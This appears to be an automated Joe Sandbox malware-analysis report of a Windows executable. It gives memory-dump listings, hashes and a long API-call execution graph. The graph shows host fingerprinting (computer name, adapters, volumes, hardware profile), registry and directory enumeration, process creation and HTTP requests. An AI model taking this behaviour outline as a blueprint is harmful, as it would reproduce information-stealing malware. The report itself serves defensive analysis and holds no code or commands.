                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Reset < >
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.283028819.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.283024724.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283486430.00000001405D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283497570.00000001405D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283503666.00000001405E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283503666.00000001405F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283503666.00000001405F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283518374.00000001405F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283526999.0000000140625000.00000010.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.283531068.0000000140627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_140000000_lJ2eYRm0Bd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                      • Opcode ID: 616ddfd438224194e569397b093716ae8ee4a8aa5a7343615e2ae389b3f0f362
                                                                                                                                                      • Instruction ID: 101157cd47283f9489e87a1647378407c79a5f7933ada9f2cf7b50bce385bd5e
                                                                                                                                                      • Opcode Fuzzy Hash: 616ddfd438224194e569397b093716ae8ee4a8aa5a7343615e2ae389b3f0f362
                                                                                                                                                      • Instruction Fuzzy Hash: 06018431224A808AE7428F23F8403D56760FB4DB90F456621EF5E4B7B4DB3CC8978B40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:5%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:34.4%
                                                                                                                                                      Total number of Nodes:585
                                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                                      execution_graph 31344 8c428d 7 API calls ___scrt_uninitialize_crt 31245 8cc684 31258 8d943a GetEnvironmentStringsW 31245->31258 31247 8cc695 31248 8cc69b 31247->31248 31249 8cc6a7 31247->31249 31251 8d4594 ___free_lconv_mon 14 API calls 31248->31251 31265 8cc798 31249->31265 31253 8cc6a1 31251->31253 31254 8d4594 ___free_lconv_mon 14 API calls 31255 8cc6cb 31254->31255 31256 8d4594 ___free_lconv_mon 14 API calls 31255->31256 31257 8cc6d1 31256->31257 31259 8d9449 31258->31259 31260 8d944b 31258->31260 31259->31247 31261 8d4edf __fread_nolock 15 API calls 31260->31261 31262 8d9460 __fprintf_l 31261->31262 31263 8d4594 ___free_lconv_mon 14 API calls 31262->31263 31264 8d947a FreeEnvironmentStringsW 31263->31264 31264->31247 31267 8cc7b7 31265->31267 31287 8d66a0 31267->31287 31268 8cc7f7 31269 8cc7ff 31268->31269 31277 8cc809 31268->31277 31270 8d4594 ___free_lconv_mon 14 API calls 31269->31270 31286 8cc6ae 31270->31286 31271 8cc87e 31272 8d4594 ___free_lconv_mon 14 API calls 31271->31272 31272->31286 31273 8d66a0 __dosmaperr 14 API calls 31273->31277 31274 8cc88e 31276 8cc73d 14 API calls 31274->31276 31275 8d7708 29 API calls 31275->31277 31278 8cc894 31276->31278 31277->31271 31277->31273 31277->31274 31277->31275 31279 8cc8a9 31277->31279 31283 8d4594 ___free_lconv_mon 14 API calls 31277->31283 31280 8d4594 ___free_lconv_mon 14 API calls 31278->31280 31282 8d4677 ___std_exception_copy 11 API calls 31279->31282 31281 8cc89c 31280->31281 31284 8d4594 ___free_lconv_mon 14 API calls 31281->31284 31285 8cc8b5 31282->31285 31283->31277 31284->31286 31286->31254 31288 8d66b9 __dosmaperr 31287->31288 31289 8d66d8 RtlAllocateHeap 31288->31289 31290 8d66ed 31288->31290 31289->31288 31289->31290 31292 8cbbc6 14 API calls __dosmaperr 31290->31292 31292->31290 31390 8a2181 77 API calls __fread_nolock 31393 8d619e 57 API calls TranslatorGuardHandler 31347 8d9097 32 API calls __fread_nolock 31349 891cab 29 API calls 31351 8d4ca6 15 API calls 2 library calls 31226 8c0dbe 31231 8c1349 SetUnhandledExceptionFilter 31226->31231 31228 8c0dc3 31232 8cd426 29 API calls 2 library calls 31228->31232 31230 8c0dce 31231->31228 31232->31230 31403 8d2fbb FreeLibrary 31353 8a40b7 79 API calls 31405 8c51cc 46 API calls TranslatorGuardHandler 31407 8cefc8 44 API calls 31410 8d3dc2 51 API calls 31358 8d34db GetProcessHeap 31360 8d62d6 18 API calls 3 library calls 31293 8c0dd0 31294 8c0ddc ___scrt_is_nonwritable_in_current_image 31293->31294 31321 8c107b 31294->31321 31296 8c0f36 31334 8c1355 4 API calls 2 library calls 31296->31334 31298 8c0f3d 31335 8cac76 23 API calls CallUnexpected 31298->31335 31299 8c0de3 31299->31296 31309 8c0e0d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 31299->31309 31301 8c0f43 31336 8cac8c 23 API calls CallUnexpected 31301->31336 31303 8c0f4b 31337 8c11a7 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 31303->31337 31305 8c0e2c 31306 8c0f51 __scrt_common_main_seh 31307 8c0ead 31330 8c12ce GetStartupInfoW __fread_nolock 31307->31330 31309->31305 31309->31307 31311 8c0ea6 31309->31311 31310 8c0eb3 31312 8c0ebb ExitProcess 31310->31312 31329 8cacc0 41 API calls 3 library calls 31311->31329 31331 8c12ff GetModuleHandleW 31312->31331 31315 8c0ecf 31315->31298 31316 8c0ed3 31315->31316 31317 8c0edc 31316->31317 31332 8caca2 23 API calls CallUnexpected 31316->31332 31333 8c10b4 77 API calls ___scrt_uninitialize_crt 31317->31333 31320 8c0ee4 31320->31305 31322 8c1084 31321->31322 31338 8c1578 IsProcessorFeaturePresent 31322->31338 31324 8c1090 31339 8c1a82 10 API calls 2 library calls 31324->31339 31326 8c1095 31328 8c1099 31326->31328 31340 8c1aa1 7 API calls 2 library calls 31326->31340 31328->31299 31329->31307 31330->31310 31331->31315 31332->31317 31333->31320 31334->31298 31335->31301 31336->31303 31337->31306 31338->31324 31339->31326 31340->31328 31361 89f0d5 54 API calls __CreateFrameInfo 31362 8d34ed 16 API calls __dosmaperr 31419 8911e2 41 API calls __dosmaperr 31366 8d2ee0 5 API calls TranslatorGuardHandler 31234 895dfc 31235 895e0a 31234->31235 31236 895e0e 31235->31236 31238 895e64 31235->31238 31241 8d4edf 15 API calls 31238->31241 31242 8ce964 15 API calls 31238->31242 31239 895f5b __fprintf_l 31239->31236 31240 895e7c 31240->31239 31243 8d4edf 15 API calls 31240->31243 31244 8ce964 15 API calls 31240->31244 31241->31240 31242->31240 31243->31239 31244->31239 31423 8911ff 45 API calls _strlen 31425 8deff6 30 API calls std::exception::exception 31368 8c0ef1 14 API calls 31233 895ea7 16 API calls __fprintf_l 31369 8a160e 16 API calls __fprintf_l 31427 8c0d0b 58 API calls __RTC_Initialize 31371 8dbc04 42 API calls 2 library calls 31430 8c0f06 23 API calls 31431 8c1b01 RtlUnwind ___except_validate_context_record TranslatorGuardHandler __IsNonwritableInCurrentImage 31373 8dae03 74 API calls 3 library calls 30666 8b571b 30678 8b56cf 30666->30678 30680 8b56dc 30678->30680 30681 8b56f1 30680->30681 30684 8973f0 30680->30684 30697 8b15e8 30681->30697 30683 8b5713 ExitProcess 30695 897403 ___scrt_uninitialize_crt 30684->30695 30685 89798f GetFileSizeEx 30685->30695 30686 897a8e CreateFileW 30686->30695 30687 897a07 GetModuleFileNameW 30687->30695 30689 89755d CloseHandle 30689->30695 30690 897b9d 18 API calls 30696 8975f2 30690->30696 30691 897689 ReadFile FindCloseChangeNotification 30691->30695 30692 897b4a 30692->30680 30693 897b57 ExitProcess 30695->30685 30695->30686 30695->30687 30695->30689 30695->30691 30695->30692 30695->30693 30695->30696 30749 8ce5b4 30695->30749 30752 8ce964 30695->30752 30696->30690 30696->30695 30747 8b15ff __fread_nolock _strlen 30697->30747 30698 8b29db ExpandEnvironmentStringsW 30868 8cd455 GetSystemTimeAsFileTime 30698->30868 30699 8b2b4d CreateProcessW CloseHandle 30699->30747 30700 8b1791 CreateProcessW CloseHandle 30700->30747 30705 8ceca0 41 API calls 30705->30747 30707 8a8881 88 API calls 30743 8b3c84 __fread_nolock __fprintf_l 30707->30743 30708 8a9760 73 API calls 30708->30747 30709 8ce9ac 43 API calls 30709->30747 30710 8ce5b4 14 API calls ___std_exception_copy 30710->30747 30711 8b15e8 220 API calls 30711->30747 30712 8b191f LoadLibraryW 30712->30747 30713 8b5690 45 API calls 30713->30747 30714 8b5587 30714->30683 30715 8b5474 30883 8b5690 45 API calls 30715->30883 30716 8b54a4 30729 8b56cf 220 API calls 30716->30729 30717 8b5514 30730 8b56cf 220 API calls 30717->30730 30718 8b5544 30731 8b56cf 220 API calls 30718->30731 30722 8b5484 30732 8b56cf 220 API calls 30722->30732 30723 8b54c4 30734 8b15e8 220 API calls 30723->30734 30724 8b556f 30728 8b15e8 220 API calls 30724->30728 30726 8ce9ac 43 API calls 30726->30743 30728->30714 30729->30723 30730->30722 30735 8b5554 30731->30735 30732->30715 30739 8b55c9 30734->30739 30740 8b56cf 220 API calls 30735->30740 30736 8b5534 30884 8c43f1 45 API calls ___std_exception_copy 30736->30884 30741 8b56cf 220 API calls 30739->30741 30740->30722 30741->30722 30742 8a9a56 131 API calls 30742->30747 30743->30707 30743->30726 30743->30747 30870 8b8280 53 API calls __fprintf_l 30743->30870 30880 8b5690 45 API calls 30743->30880 30745 8b56bd 30745->30683 30747->30698 30747->30699 30747->30700 30747->30705 30747->30708 30747->30709 30747->30710 30747->30711 30747->30712 30747->30713 30747->30714 30747->30715 30747->30716 30747->30717 30747->30718 30747->30722 30747->30723 30747->30724 30747->30735 30747->30736 30747->30742 30747->30743 30748 8ce964 15 API calls ___std_exception_copy 30747->30748 30768 8948ac 30747->30768 30792 89c7db 30747->30792 30807 8bc95c 30747->30807 30826 8b8e94 30747->30826 30848 8b83dc 30747->30848 30862 8b8144 30747->30862 30871 8b6303 97 API calls 2 library calls 30747->30871 30872 8b12da 30747->30872 30881 8cec8e 41 API calls _unexpected 30747->30881 30882 89116d 45 API calls 30747->30882 30748->30747 30759 8d4594 30749->30759 30757 8d4edf __dosmaperr 30752->30757 30753 8d4f1d 30767 8cbbc6 14 API calls __dosmaperr 30753->30767 30754 8d4f08 RtlAllocateHeap 30756 8d4f1b 30754->30756 30754->30757 30756->30695 30757->30753 30757->30754 30766 8d48d0 RtlEnterCriticalSection RtlLeaveCriticalSection __fread_nolock 30757->30766 30760 8ce5cc 30759->30760 30761 8d459f RtlFreeHeap 30759->30761 30760->30695 30761->30760 30762 8d45b4 GetLastError 30761->30762 30763 8d45c1 __dosmaperr 30762->30763 30765 8cbbc6 14 API calls __dosmaperr 30763->30765 30765->30760 30766->30757 30767->30756 30790 8948c5 _strlen 30768->30790 30770 893cbf 102 API calls 30770->30790 30771 8b03f4 16 API calls 30779 8955d5 lstrcatW 30771->30779 30772 894f13 lstrcatW 30772->30790 30773 8ce964 15 API calls ___std_exception_copy 30773->30790 30775 89563d lstrcatW 30780 8ce5b4 ___std_exception_copy 14 API calls 30775->30780 30778 89515b lstrcatW 30778->30790 30788 8ce5b4 ___std_exception_copy 14 API calls 30779->30788 30780->30790 30782 8ce5b4 14 API calls ___std_exception_copy 30782->30790 30785 89597c 30785->30747 30786 8cddca 15 API calls __CreateFrameInfo 30786->30790 30788->30790 30790->30770 30790->30771 30790->30772 30790->30773 30790->30775 30790->30778 30790->30782 30790->30785 30790->30786 30885 892abc 30790->30885 30894 8b03f4 30790->30894 30902 8cecc1 30790->30902 30915 8ce9ac 30790->30915 30919 8be364 30790->30919 30925 8a988d 30790->30925 30931 89116d 45 API calls 30790->30931 30932 89a2db 30790->30932 30937 8b0352 15 API calls ___std_exception_copy 30790->30937 30938 899f88 30790->30938 30805 89c7ff 30792->30805 30793 899f88 33 API calls 30793->30805 30794 8cddca 15 API calls __CreateFrameInfo 30794->30805 30795 8a988d 79 API calls 30795->30805 30796 89bf5c 97 API calls 30796->30805 30797 89c7db 97 API calls 30797->30805 30798 89da42 30800 8ce5b4 ___std_exception_copy 14 API calls 30798->30800 30799 89a30c 33 API calls 30799->30805 30801 89da4a 30800->30801 30803 8ce5b4 ___std_exception_copy 14 API calls 30801->30803 30802 8be364 2 API calls 30802->30805 30804 89da55 30803->30804 30804->30747 30805->30793 30805->30794 30805->30795 30805->30796 30805->30797 30805->30798 30805->30799 30805->30802 30806 8ce5b4 ___std_exception_copy 14 API calls 30805->30806 30806->30805 30815 8bc977 __fread_nolock __fprintf_l _strlen 30807->30815 30808 8be16b InternetConnectA 30808->30815 30809 8bdcc1 InternetQueryDataAvailable 30809->30815 30810 8be247 InternetQueryDataAvailable 30810->30815 30811 8bd9ac GetModuleHandleW 30811->30815 30812 8bdb45 InternetReadFile 30812->30815 30813 8bd919 HttpOpenRequestW 30813->30815 30814 8bce98 InternetCloseHandle 30814->30815 30815->30808 30815->30809 30815->30810 30815->30811 30815->30812 30815->30813 30815->30814 30816 8ce964 ___std_exception_copy 15 API calls 30815->30816 30817 8bd1ee InternetOpenW 30815->30817 30818 8cecc1 16 API calls 30815->30818 30819 8be341 30815->30819 30820 8bc57f 48 API calls 30815->30820 30821 8b02e8 46 API calls 30815->30821 30822 8bc1ec 48 API calls 30815->30822 30823 8ce5b4 ___std_exception_copy 14 API calls 30815->30823 30824 8bc95c 48 API calls 30815->30824 30825 8bd565 HttpSendRequestA 30815->30825 30816->30815 30817->30815 30818->30815 30819->30747 30820->30815 30821->30815 30822->30815 30823->30815 30824->30815 30825->30815 30846 8b8eab __fread_nolock __fprintf_l _strlen 30826->30846 30828 8bb76b GetPhysicallyInstalledSystemMemory 30828->30846 30829 8bb8f7 GetComputerNameExA 30829->30846 30830 8baf9c GetComputerNameExA 30830->30846 30831 8bbff5 GetComputerNameExA 30831->30846 30832 8b8e94 91 API calls 30832->30846 30833 8bc1dc 30833->30747 30834 8ba514 EnumDisplayDevicesA 30834->30846 30835 8b9260 GetComputerNameExA 30835->30846 30837 8be364 GetPEB lstrcmpiW 30837->30846 30838 8be364 2 API calls 30841 8b9ef5 KiUserCallbackDispatcher 30838->30841 30839 8b02e8 46 API calls 30839->30846 30840 8b0352 15 API calls 30840->30846 30843 8be364 2 API calls 30841->30843 30842 8ce5b4 14 API calls ___std_exception_copy 30842->30846 30843->30846 30844 8cc990 29 API calls 30844->30846 30845 8a988d 79 API calls 30845->30846 30846->30828 30846->30829 30846->30830 30846->30831 30846->30832 30846->30833 30846->30834 30846->30835 30846->30837 30846->30838 30846->30839 30846->30840 30846->30842 30846->30844 30846->30845 30847 8cddca 15 API calls __CreateFrameInfo 30846->30847 31154 8d27c6 43 API calls ___std_exception_copy 30846->31154 31155 8af8c0 30846->31155 30847->30846 30861 8b8407 __fprintf_l _strlen 30848->30861 30849 8b8d3e wsprintfW 30849->30861 30850 8b8b98 RegQueryValueExW 30850->30861 30851 8b8bd2 RegOpenKeyExW 30851->30861 30852 8b8a95 wsprintfW 30852->30861 30853 8b844f RegOpenKeyExW 30853->30861 30854 8a988d 79 API calls 30854->30861 30855 8b870e RegEnumKeyExW 30855->30861 30856 8b8e68 30856->30747 30857 8cddca __CreateFrameInfo 15 API calls 30857->30861 30858 8b83dc 79 API calls 30858->30861 30860 8ce5b4 14 API calls ___std_exception_copy 30860->30861 30861->30849 30861->30850 30861->30851 30861->30852 30861->30853 30861->30854 30861->30855 30861->30856 30861->30857 30861->30858 30861->30860 31206 8a9455 74 API calls 2 library calls 30861->31206 30863 8b8163 __fprintf_l 30862->30863 30864 8a988d 79 API calls 30863->30864 30865 8b8271 30863->30865 31207 8b8091 103 API calls 30863->31207 30867 8b8209 GetProcessHeap RtlFreeHeap 30864->30867 30865->30747 30867->30863 30869 8cd48e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 30868->30869 30869->30747 30871->30747 31208 8a9760 30872->31208 30874 8a9760 73 API calls 30879 8b12ed 30874->30879 30875 8b1294 97 API calls 30875->30879 30876 8b15d5 30876->30747 30877 8b12da 146 API calls 30877->30879 30878 8a9a56 131 API calls 30878->30879 30879->30874 30879->30875 30879->30876 30879->30877 30879->30878 30880->30743 30881->30747 30882->30747 30883->30736 30884->30745 30890 892ad5 __fprintf_l 30885->30890 30887 8be364 GetPEB lstrcmpiW 30887->30890 30888 8ce5b4 14 API calls ___std_exception_copy 30888->30890 30889 893534 30889->30790 30890->30887 30890->30888 30890->30889 30891 8ce964 15 API calls ___std_exception_copy 30890->30891 30892 899f88 33 API calls 30890->30892 30948 8b0352 15 API calls ___std_exception_copy 30890->30948 30949 89116d 45 API calls 30890->30949 30891->30890 30892->30890 30895 8b0402 30894->30895 30895->30895 30896 8ce964 ___std_exception_copy 15 API calls 30895->30896 30897 8b0417 30896->30897 30950 8cddca 30897->30950 30899 8b0476 30900 8ce5b4 ___std_exception_copy 14 API calls 30899->30900 30901 8b04ab 30900->30901 30901->30790 30903 8dc6e8 30902->30903 30904 8dc6f5 30903->30904 30905 8dc700 30903->30905 30956 8d4edf 30904->30956 30907 8dc708 30905->30907 30914 8dc711 __dosmaperr 30905->30914 30908 8d4594 ___free_lconv_mon 14 API calls 30907->30908 30911 8dc6fd 30908->30911 30909 8dc73b RtlReAllocateHeap 30909->30911 30909->30914 30910 8dc716 30963 8cbbc6 14 API calls __dosmaperr 30910->30963 30911->30790 30914->30909 30914->30910 30964 8d48d0 RtlEnterCriticalSection RtlLeaveCriticalSection __fread_nolock 30914->30964 30916 8ce9bf ___std_exception_copy 30915->30916 30967 8ce9e3 30916->30967 30918 8ce9d1 ___std_exception_copy 30918->30790 30923 8be37f 30919->30923 30920 8be6cf 30920->30790 30921 8be364 2 API calls 30921->30923 30922 8c0073 GetPEB lstrcmpiW 30922->30923 30923->30920 30923->30921 30923->30922 30992 8bf152 GetPEB lstrcmpiW _strlen 30923->30992 30929 8a98a8 30925->30929 30928 8a9920 30928->30790 30929->30928 30993 8a68a9 30929->30993 30996 8a6e4a 46 API calls 2 library calls 30929->30996 30997 8a9455 74 API calls 2 library calls 30929->30997 30931->30790 31118 8998ec 30932->31118 30935 8be364 2 API calls 30936 89a2fd 30935->30936 30936->30790 30937->30790 30946 899fad 30938->30946 30939 89a294 NtReadFile 30941 8be364 2 API calls 30939->30941 30940 8998ec 32 API calls 30940->30946 30945 89a2ca 30941->30945 30942 8ce964 15 API calls ___std_exception_copy 30942->30946 30943 89a30c 32 API calls 30943->30946 30944 8cddca __CreateFrameInfo 15 API calls 30944->30946 30945->30790 30946->30939 30946->30940 30946->30942 30946->30943 30946->30944 30947 8be364 GetPEB lstrcmpiW 30946->30947 30947->30946 30948->30890 30949->30890 30952 8d66a0 __dosmaperr 30950->30952 30951 8d66d8 RtlAllocateHeap 30951->30952 30953 8d66ed 30951->30953 30952->30951 30952->30953 30955 8cbbc6 14 API calls __dosmaperr 30953->30955 30955->30953 30957 8d4f1d 30956->30957 30962 8d4eed __dosmaperr 30956->30962 30966 8cbbc6 14 API calls __dosmaperr 30957->30966 30958 8d4f08 RtlAllocateHeap 30960 8d4f1b 30958->30960 30958->30962 30960->30911 30962->30957 30962->30958 30965 8d48d0 RtlEnterCriticalSection RtlLeaveCriticalSection __fread_nolock 30962->30965 30963->30911 30964->30914 30965->30962 30966->30960 30968 8cea19 30967->30968 30969 8cea2d 30968->30969 30970 8cea51 30968->30970 30979 8cea46 30968->30979 30986 8d47f3 29 API calls ___std_exception_copy 30969->30986 30977 8cea61 30970->30977 30987 8c4600 41 API calls ___scrt_uninitialize_crt 30970->30987 30973 8cea99 30975 8ceb5a 30973->30975 30976 8ceaa1 30973->30976 30974 8cea7b 30988 8dc5b4 5 API calls ___scrt_uninitialize_crt 30974->30988 30975->30979 30991 8d79f6 MultiByteToWideChar 30975->30991 30976->30979 30989 8d79f6 MultiByteToWideChar 30976->30989 30977->30973 30977->30974 30979->30918 30982 8cead8 30982->30979 30983 8ceae3 GetLastError 30982->30983 30983->30979 30985 8ceb03 30983->30985 30985->30979 30990 8d79f6 MultiByteToWideChar 30985->30990 30986->30979 30987->30977 30988->30979 30989->30982 30990->30979 30991->30979 30992->30923 30998 8a68bc 30993->30998 30995 8a68b8 30995->30929 30996->30929 30997->30929 30999 8a68d3 _strlen 30998->30999 31012 8a698d 30998->31012 31000 8a6918 30999->31000 31002 8ce5b4 ___std_exception_copy 14 API calls 30999->31002 30999->31012 31013 8a6e11 31000->31013 31002->31000 31004 8a6982 31007 8ce5b4 ___std_exception_copy 14 API calls 31004->31007 31004->31012 31005 8a694d 31005->31004 31019 8a2d4c 46 API calls 31005->31019 31007->31012 31008 8a6a0d 31008->31004 31009 8cd455 GetSystemTimeAsFileTime 31008->31009 31010 8a6b22 31009->31010 31016 8a50e4 31010->31016 31012->30995 31014 8cddca __CreateFrameInfo 15 API calls 31013->31014 31015 8a6936 31014->31015 31015->31005 31015->31008 31015->31012 31020 8cca65 31016->31020 31018 8a5109 31018->31004 31019->31004 31021 8cca70 31020->31021 31022 8cca80 31021->31022 31023 8cca93 31021->31023 31066 8cbbc6 14 API calls __dosmaperr 31022->31066 31024 8ccaa5 31023->31024 31035 8ccab8 31023->31035 31068 8cbbc6 14 API calls __dosmaperr 31024->31068 31026 8cca85 31067 8d4667 29 API calls ___std_exception_copy 31026->31067 31029 8ccaaa 31069 8d4667 29 API calls ___std_exception_copy 31029->31069 31030 8ccad8 31070 8cbbc6 14 API calls __dosmaperr 31030->31070 31031 8ccae9 31058 8d9c2e 31031->31058 31035->31030 31035->31031 31038 8ccb00 31039 8cccf4 31038->31039 31078 8d98bd 31038->31078 31097 8d4677 11 API calls CallUnexpected 31039->31097 31042 8cccfe 31043 8ccb12 31043->31039 31085 8d98e9 31043->31085 31045 8ccb24 31045->31039 31046 8ccb2d 31045->31046 31047 8ccbb2 31046->31047 31048 8ccb4e 31046->31048 31095 8d9950 29 API calls 3 library calls 31047->31095 31092 8d9950 29 API calls 3 library calls 31048->31092 31050 8ccbb9 31057 8cca8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 31050->31057 31096 8d9bda 29 API calls 2 library calls 31050->31096 31052 8ccb66 31052->31057 31093 8d9bda 29 API calls 2 library calls 31052->31093 31055 8ccb7f 31055->31057 31094 8d9950 29 API calls 3 library calls 31055->31094 31057->31018 31059 8d9c3a ___scrt_is_nonwritable_in_current_image 31058->31059 31060 8ccaee 31059->31060 31098 8d34ad RtlEnterCriticalSection 31059->31098 31071 8d9891 31060->31071 31062 8d9c4b 31063 8d9c5f 31062->31063 31099 8da177 31062->31099 31111 8d9c82 RtlLeaveCriticalSection CallUnexpected 31063->31111 31066->31026 31067->31057 31068->31029 31069->31057 31070->31057 31072 8d989d 31071->31072 31073 8d98b2 31071->31073 31112 8cbbc6 14 API calls __dosmaperr 31072->31112 31073->31038 31075 8d98a2 31113 8d4667 29 API calls ___std_exception_copy 31075->31113 31077 8d98ad 31077->31038 31079 8d98de 31078->31079 31080 8d98c9 31078->31080 31079->31043 31114 8cbbc6 14 API calls __dosmaperr 31080->31114 31082 8d98ce 31115 8d4667 29 API calls ___std_exception_copy 31082->31115 31084 8d98d9 31084->31043 31086 8d990a 31085->31086 31087 8d98f5 31085->31087 31086->31045 31116 8cbbc6 14 API calls __dosmaperr 31087->31116 31089 8d98fa 31117 8d4667 29 API calls ___std_exception_copy 31089->31117 31091 8d9905 31091->31045 31092->31052 31093->31055 31094->31057 31095->31050 31096->31057 31097->31042 31098->31062 31100 8d9c8b 43 API calls 31099->31100 31101 8da1b0 31100->31101 31102 8da1d3 31101->31102 31103 8da1ca 31101->31103 31104 8d9d44 44 API calls 31102->31104 31105 8d9ee5 29 API calls 31103->31105 31106 8da1d0 31104->31106 31105->31106 31107 8d4594 ___free_lconv_mon 14 API calls 31106->31107 31108 8da1de 31107->31108 31109 8c1758 TranslatorGuardHandler 5 API calls 31108->31109 31110 8da1eb 31109->31110 31110->31063 31111->31060 31112->31075 31113->31077 31114->31082 31115->31084 31116->31089 31117->31091 31119 899901 31118->31119 31120 899f3e lstrlenW 31119->31120 31121 8cddca 15 API calls __CreateFrameInfo 31119->31121 31123 8be364 2 API calls 31119->31123 31124 899f6b 31119->31124 31125 899f88 30 API calls 31119->31125 31127 8be364 2 API calls 31119->31127 31128 8998ec 30 API calls 31119->31128 31130 899cf2 lstrlenW 31119->31130 31131 89a30c 31119->31131 31120->31119 31121->31119 31126 8999f2 NtCreateFile 31123->31126 31124->30935 31124->30936 31125->31119 31129 8be364 2 API calls 31126->31129 31127->31119 31128->31119 31129->31119 31130->31119 31152 89a31e __fprintf_l 31131->31152 31132 89bde3 lstrcmpW 31132->31152 31133 89becc lstrcmpW 31133->31152 31134 89bb0b lstrlenW 31134->31152 31135 89bf50 31135->31119 31136 89b2db lstrcmpW 31136->31152 31137 89a573 lstrlenW 31137->31152 31138 89b39f NtQueryDirectoryFile 31138->31152 31139 89a720 lstrcmpW 31139->31152 31140 8cddca 15 API calls __CreateFrameInfo 31140->31152 31141 89a9c2 lstrcmpW 31141->31152 31142 8cddca __CreateFrameInfo 15 API calls 31146 89bbd9 lstrlenW 31142->31146 31143 8998ec 22 API calls 31143->31152 31144 8be364 2 API calls 31147 89b32a NtCreateFile 31144->31147 31145 8be364 GetPEB lstrcmpiW 31145->31152 31146->31152 31147->31152 31148 89a2db 22 API calls 31148->31152 31149 899f88 22 API calls 31149->31152 31150 89a30c 22 API calls 31150->31152 31151 89b67b lstrlenW 31151->31152 31152->31132 31152->31133 31152->31134 31152->31135 31152->31136 31152->31137 31152->31138 31152->31139 31152->31140 31152->31141 31152->31142 31152->31143 31152->31144 31152->31145 31152->31148 31152->31149 31152->31150 31152->31151 31153 8ce964 ___std_exception_copy 15 API calls 31152->31153 31153->31152 31154->30846 31165 8af8e2 __fread_nolock __fprintf_l 31155->31165 31156 8b01c3 GetCurrentHwProfileW 31159 8cddca __CreateFrameInfo 15 API calls 31156->31159 31157 8af8c0 53 API calls 31157->31165 31158 8b02d3 31158->30846 31159->31165 31160 8ad8f0 53 API calls 31160->31165 31161 8cddca __CreateFrameInfo 15 API calls 31161->31165 31162 8ae80e GetVolumeInformationW 31162->31165 31163 8ae7cf 45 API calls 31163->31165 31164 8af899 16 API calls 31166 8afb07 31164->31166 31165->31156 31165->31157 31165->31158 31165->31160 31165->31161 31165->31162 31165->31163 31165->31166 31167 8b02e8 46 API calls 31165->31167 31166->31164 31166->31165 31169 8ad8f0 31166->31169 31167->31165 31182 8ad903 __fread_nolock 31169->31182 31170 8ae3d2 GetAdaptersInfo 31170->31182 31171 8ae230 GetAdaptersInfo 31171->31182 31172 8ae7cf 45 API calls 31172->31182 31173 8b02e8 46 API calls 31173->31182 31174 8adb7c 31174->31182 31183 8af899 16 API calls 31174->31183 31186 8af8c0 52 API calls 31174->31186 31187 8b02e8 31174->31187 31175 8af8c0 52 API calls 31175->31182 31176 8ce964 ___std_exception_copy 15 API calls 31176->31182 31177 8ae80e GetVolumeInformationW 31177->31182 31178 8ae7c4 31178->31166 31179 8d22e7 29 API calls 31179->31182 31180 8ce5b4 ___std_exception_copy 14 API calls 31180->31182 31181 8cddca __CreateFrameInfo 15 API calls 31181->31182 31182->31170 31182->31171 31182->31172 31182->31173 31182->31174 31182->31175 31182->31176 31182->31177 31182->31178 31182->31179 31182->31180 31182->31181 31185 8ad8f0 52 API calls 31182->31185 31183->31174 31185->31182 31186->31174 31188 8b0305 31187->31188 31191 8c44b4 31188->31191 31190 8b0315 31190->31174 31192 8c44c8 ___std_exception_copy 31191->31192 31195 8c4af2 31192->31195 31194 8c44e3 ___std_exception_copy 31194->31190 31196 8c4afe 31195->31196 31198 8c4b21 31195->31198 31203 8d47f3 29 API calls ___std_exception_copy 31196->31203 31202 8c4b48 31198->31202 31204 8c670f 46 API calls 2 library calls 31198->31204 31199 8c4b19 31199->31194 31202->31199 31205 8d47f3 29 API calls ___std_exception_copy 31202->31205 31203->31199 31204->31202 31205->31199 31206->30861 31207->30863 31210 8a9784 31208->31210 31211 8ce964 ___std_exception_copy 15 API calls 31210->31211 31212 8a9871 31210->31212 31213 8a74f0 31210->31213 31211->31210 31212->30879 31214 8cddca __CreateFrameInfo 15 API calls 31213->31214 31218 8a74ff 31214->31218 31215 8a7548 31216 8ce5b4 ___std_exception_copy 14 API calls 31215->31216 31217 8a756d 31215->31217 31216->31217 31217->31210 31218->31215 31218->31217 31219 8a753e 31218->31219 31221 8a754d 31218->31221 31223 8a1f15 72 API calls 31219->31223 31221->31215 31224 8a4512 71 API calls 31221->31224 31223->31215 31224->31215 31433 8d3b1f 34 API calls 2 library calls 31375 8cfa1b 11 API calls 31435 8be6ff 